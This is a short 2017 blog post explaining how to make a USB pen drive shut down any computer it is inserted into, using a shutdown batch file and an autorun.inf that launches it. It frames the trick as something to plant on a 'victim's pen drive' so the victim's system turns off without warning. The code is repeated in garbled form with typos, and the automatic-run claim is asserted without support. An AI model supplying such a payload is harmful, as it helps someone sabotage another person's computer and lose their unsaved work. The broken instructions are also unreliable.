Wednesday 25 January 2017

How To Shutdown Computer Using Pendrive

Usually we shutdown the computer or the laptop by continuous pressing or holding the power button to shut down your PC for few seconds, You can also able to shutdown the computer using the pen drive. Just the notepad tricks you can use the same technique in the Pendrive to close the PC/laptop.it is possible by typing the batch file in the notepad. The system will turn off when you insert the Pendrive to the PC or the laptop..Just surprise your friends with that simple trick.
Step 1:>copy this  code into notepad:
@echo off
shutdown -s -t 00
screenshot-10
@echo off                                                                                                    shutdown -s-t oo
Save it with .bat extension (for eg: Shutdown.bat).
screenshot-11
Save it with .bat extension (for eg: Shubham.bat)
Step 2:>Now again open the notepad and copy this code:
[autorun]
Open=shutdown.bat
Action=Mouse Disable
screenshot-12
(autorun)                                                                                                                                                                open=shutdown.bat                                                                                                           action= mouse disable
Save it as “autorun.inf”
screenshot-13
Save it as "autorun.inf"
//don't forget to change the "autorun.inf"
Step 3:>Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim inserts his pen drive, the system will be turned off automatically.
want any help ? or want to say thanks, comment here

0 comments: